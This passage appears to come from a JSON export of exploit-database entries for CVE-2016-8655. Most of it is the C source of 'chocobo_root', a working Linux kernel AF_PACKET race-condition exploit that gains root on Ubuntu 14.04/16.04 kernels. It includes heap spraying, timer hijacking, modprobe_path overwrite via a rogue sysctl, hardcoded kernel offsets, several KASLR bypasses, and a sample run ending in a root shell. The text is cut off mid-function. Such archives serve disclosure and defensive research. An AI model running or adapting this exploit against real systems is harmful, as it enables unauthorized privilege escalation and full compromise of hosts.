fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n\r\n uname(&u);\r\n\r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n\r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n\r\n printf(\"kernel version: %s\\n\",buf);\r\n\r\n\r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n\r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n\r\n off = 
&offsets[i];\r\n break;\r\n }\r\n }\r\n\r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n\r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n\r\n if(!off) {\r\n fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n\r\n pid = fork();\r\n\r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n\r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n\r\n wrapper();\r\n exit(0);\r\n }\r\n\r\n waitpid(pid, &status, 0);\r\n\r\n launch_rootshell();\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40871"}, {"lastseen": "2019-07-26T11:22:52", "description": "", "published": "2018-12-29T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-12-29T00:00:00", "id": "EDB-ID:47170", "href": "https://www.exploit-db.com/exploits/47170", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit for CVE-2016-8655.\r\nIncludes KASLR and SMEP/SMAP bypasses.\r\nFor Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.\r\nAll kernel offsets have been tested on Ubuntu / Linux Mint.\r\n\r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ 
id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n\r\n\r\nstage 1 completed\r\nregistering new sysctl..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n\r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n\r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n\r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n\r\n11/2016\r\nby rebel\r\n---\r\nUpdated by <bcoles@gmail.com>\r\n- check number of CPU cores\r\n- KASLR bypasses\r\n- additional kernel targets\r\nhttps://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <pthread.h>\r\n#include <sched.h>\r\n#include <signal.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/sysinfo.h>\r\n#include <sys/utsname.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <netinet/if_ether.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n# define dprintf printf\r\n#else\r\n# define dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS 1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions()\r\nint kernel = -1;\r\n\r\n// New sysctl path\r\nconst char *SYSCTL_NAME = \"hack\";\r\nconst char *SYSCTL_PATH = \"/proc/sys/hack\";\r\n\r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n\r\nstruct kernel_info {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long 
register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n { \"4.4.0-21-generic #37~14.04.1-Ubuntu\", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },\r\n { \"4.4.0-22-generic #40~14.04.1-Ubuntu\", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },\r\n { \"4.4.0-24-generic #43~14.04.1-Ubuntu\", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },\r\n { \"4.4.0-28-generic #47~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },\r\n { \"4.4.0-31-generic #50~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },\r\n { \"4.4.0-34-generic #53~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },\r\n { \"4.4.0-36-generic #55~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },\r\n { \"4.4.0-38-generic #57~14.04.1-Ubuntu\", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },\r\n { \"4.4.0-42-generic #62~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274300, 0x06b880 },\r\n { \"4.4.0-45-generic #66~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274340, 0x06b880 },\r\n //{\"4.4.0-46-generic #67~14.04.1-Ubuntu\",0x0842f0,0xe4b100,0x274580,0x06b880},\r\n { \"4.4.0-47-generic #68~14.04.1-Ubuntu\", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },\r\n //{\"4.4.0-49-generic #70~14.04.1-Ubuntu\",0x084350,0xe4b100,0x274b10,0x06b880},\r\n { \"4.4.0-51-generic #72~14.04.1-Ubuntu\", 0x084350, 0xe4b100, 0x274750, 0x06b880 },\r\n\r\n { \"4.4.0-21-generic #37-Ubuntu\", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },\r\n { \"4.4.0-22-generic #40-Ubuntu\", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },\r\n { \"4.4.0-24-generic #43-Ubuntu\", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },\r\n { \"4.4.0-28-generic #47-Ubuntu\", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },\r\n { \"4.4.0-31-generic #50-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },\r\n { \"4.4.0-34-generic #53-Ubuntu\", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },\r\n { \"4.4.0-36-generic #55-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },\r\n { \"4.4.0-38-generic #57-Ubuntu\", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },\r\n { 
\"4.4.0-42-generic #62-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },\r\n { \"4.4.0-43-generic #63-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },\r\n { \"4.4.0-45-generic #66-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },\r\n //{\"4.4.0-46-generic #67-Ubuntu\",0x088040,0xe48f80,0x287800,0x06f320},\r\n { \"4.4.0-47-generic #68-Ubuntu\", 0x088040, 0xe48f80, 0x287800, 0x06f320 },\r\n //{\"4.4.0-49-generic #70-Ubuntu\",0x088090,0xe48f80,0x287d40,0x06f320},\r\n { \"4.4.0-51-generic #72-Ubuntu\", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},\r\n};\r\n\r\n#define VSYSCALL 0xffffffffff600000\r\n#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring)\r\n#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path)\r\n#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)\r\n#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw)\r\n\r\n#define KMALLOC_PAD 64\r\n\r\nint pad_fds[KMALLOC_PAD];\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n\r\n#define CONF_RING_FRAMES 1\r\n\r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n\r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while (barrier) {}\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n\r\n return NULL;\r\n}\r\n\r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n\r\n while (barrier) {}\r\n\r\n while (1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, 
sizeof(val));\r\n\r\n y++;\r\n\r\n if (x != 0) break;\r\n\r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n if (x != 0) break;\r\n\r\n y++;\r\n }\r\n\r\n dprintf(\"[.] version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n\r\n return NULL;\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n\r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\", \"wtf\", exploitbuf, BUFSIZE - 24, -2);\r\n}\r\n\r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n for (x = 0; x < KMALLOC_PAD; x++)\r\n if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {\r\n dprintf(\"[-] pad_kmalloc() socket error\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n\r\n sigemptyset(&set);\r\n\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n dprintf(\"[.] new exploit attempt starting, jumping to %p, arg=%p\\n\", (void *)func, (void *)arg);\r\n\r\n pad_kmalloc();\r\n\r\n fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\r\n if (fd == -1) {\r\n dprintf(\"[-] target socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n pad_kmalloc();\r\n\r\n dprintf(\"[.] 
done, sockets allocated\\n\");\r\n\r\n val = TPACKET_V3;\r\n\r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n\r\n // try to set the timeout to 10 seconds\r\n // the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n\r\n sfd = fd;\r\n\r\n if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n dprintf(\"[-] Error creating thread\\n\");\r\n return 1;\r\n }\r\n\r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n\r\n usleep(200000);\r\n\r\n dprintf(\"[.] removing barrier and spraying...\\n\");\r\n\r\n memset(exploitbuf, '\\x00', BUFSIZE);\r\n\r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n\r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n\r\n barrier = 0;\r\n\r\n usleep(100000);\r\n\r\n while (!vers_switcher_done) usleep(100000);\r\n\r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n\r\n dprintf(\"[.] current packet version = %d\\n\",val);\r\n\r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n\r\n if (pbd == MAP_FAILED) {\r\n dprintf(\"[-] could not map pbd\\n\");\r\n exit(1);\r\n } else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n dprintf(\"[.] 
pbd->hdr.bh1.offset_to_first_pkt = %d\\n\", off);\r\n }\r\n\r\n\r\n if (val == TPACKET_V1 && off != 0) {\r\n dprintf(\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n } else {\r\n dprintf(\"[-] race not won\\n\");\r\n exit(2);\r\n }\r\n\r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n\r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n\r\n dprintf(\"\\n\");\r\n dprintf(\"[!] please wait up to a few minutes for timer to be executed.\\n\");\r\n dprintf(\"[!] if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n dprintf(\"\\n\");\r\n\r\n sleep(1);\r\n dprintf(\"[.] closing socket and verifying...\\n\");\r\n\r\n close(sfd);\r\n\r\n kmalloc();\r\n\r\n dprintf(\"[.] all messages sent\\n\");\r\n\r\n sleep(31337);\r\n exit(1);\r\n}\r\n\r\nint verification_result = 0;\r\n\r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n\r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n\r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n signal(SIGSEGV, catch_sigsegv);\r\n\r\n *vsyscall = 0xdeadbeef+x;\r\n\r\n if (*vsyscall == 0xdeadbeef+x) {\r\n dprintf(\"[~] vsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nvoid verify_stage1(void)\r\n{\r\n pthread_t v_thread;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n\r\n pthread_join(v_thread, NULL);\r\n\r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not modify vsyscall\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid verify_stage2(void)\r\n{\r\n 
struct stat b;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n if (stat(SYSCTL_PATH, &b) == 0) {\r\n dprintf(\"[~] sysctl added!\\n\");\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not add sysctl\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n\r\nretry:\r\n\r\n pid = fork();\r\n\r\n if (pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n\r\n wait(&status);\r\n\r\n dprintf(\"\\n\");\r\n\r\n if (WEXITSTATUS(status) == 2) {\r\n dprintf(\"[.] retrying stage...\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n\r\n if (WEXITSTATUS(status) != 0) {\r\n dprintf(\"[-] something bad happened, aborting exploit attempt\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n kill(pid, 9);\r\n}\r\n\r\n\r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n\r\n dprintf(\"[.] making vsyscall page writable...\\n\\n\");\r\n\r\n exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);\r\n\r\n dprintf(\"[~] done, stage 1 completed\\n\");\r\n\r\n sleep(5);\r\n\r\n dprintf(\"[.] 
registering new sysctl...\\n\\n\");\r\n\r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n\r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n\r\n strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);\r\n memcpy((char *)(VSYSCALL+0xe00), \"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(PROC_DOSTRING);\r\n c->data = (void *)(MODPROBE_PATH);\r\n c->maxlen = 256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n\r\n exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);\r\n\r\n dprintf(\"[~] done, stage 2 completed\\n\");\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\nvoid check_procs() {\r\n int min_procs = 2;\r\n\r\n int nprocs = 0;\r\n nprocs = get_nprocs_conf();\r\n\r\n if (nprocs < min_procs) {\r\n dprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n dprintf(\"[.] system has %d processor cores\\n\", nprocs);\r\n}\r\n\r\nstruct utsname get_kernel_version() {\r\n struct utsname u;\r\n int rv = uname(&u);\r\n if (rv != 0) {\r\n dprintf(\"[-] uname())\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n return u;\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\nvoid detect_versions() {\r\n struct utsname u;\r\n char kernel_version[512];\r\n\r\n u = get_kernel_version();\r\n\r\n if (strstr(u.machine, \"64\") == NULL) {\r\n dprintf(\"[-] system is not using a 64-bit kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (strstr(u.version, \"-Ubuntu\") == NULL) {\r\n dprintf(\"[-] system is not using an Ubuntu kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n char *u_ver = strtok(u.version, \" \");\r\n snprintf(kernel_version, 512, \"%s %s\", u.release, u_ver);\r\n\r\n int i;\r\n for (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {\r\n dprintf(\"[.] 
kernel version '%s' detected\\n\", kernels[i].kernel_version);\r\n kernel = i;\r\n return;\r\n }\r\n }\r\n\r\n dprintf(\"[-] kernel version not recognized\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nbool mmap_syslog(char** buffer, int* size) {\r\n *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n return false;\r\n }\r\n\r\n *size = (*size / getpagesize() + 1) * getpagesize();\r\n *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n return false;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) return 0;\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (end = start; substr[end] != '-'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) return 0;\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xffffffffff000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (start = 0; substr[start] != '-'; start++);\r\n for (end = start; substr[end] != '\\n'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n 
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xfffffffffff00000ul;\r\n r -= 0x1000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n unsigned long addr = 0;\r\n char* syslog;\r\n int size;\r\n\r\n dprintf(\"[.] trying syslog...\\n\");\r\n\r\n if (!mmap_syslog(&syslog, &size))\r\n return 0;\r\n\r\n if (strstr(kernels[kernel].kernel_version, \"14.04.1\") != NULL)\r\n addr = get_kernel_addr_trusty(syslog, size);\r\n else\r\n addr = get_kernel_addr_xenial(syslog, size);\r\n\r\n if (!addr)\r\n dprintf(\"[-] kernel base not found in syslog\\n\");\r\n\r\n return addr;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n char* path = \"/proc/kallsyms\";\r\n\r\n dprintf(\"[.] trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char path[512] = \"/boot/System.map-\";\r\n char version[32];\r\n\r\n struct utsname u;\r\n u = get_kernel_version();\r\n strcat(path, u.release);\r\n dprintf(\"[.] 
trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_mincore() {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n unsigned long iterations = 20000000;\r\n unsigned long addr = 0;\r\n\r\n dprintf(\"[.] trying mincore info leak...\\n\");\r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\r\n MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\r\n dprintf(\"[-] mmap()\\n\");\r\n return 0;\r\n }\r\n\r\n int i;\r\n for (i = 0; i <= iterations; i++) {\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf)) {\r\n dprintf(\"[-] mincore()\\n\");\r\n return 0;\r\n }\r\n\r\n int n;\r\n for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space */\r\n if (addr > 0xffffffff00000000) {\r\n addr &= 0xffffffffff000000ul;\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n return addr;\r\n }\r\n }\r\n }\r\n\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n\r\n dprintf(\"[-] kernel base not found in mincore info leak\\n\");\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n 
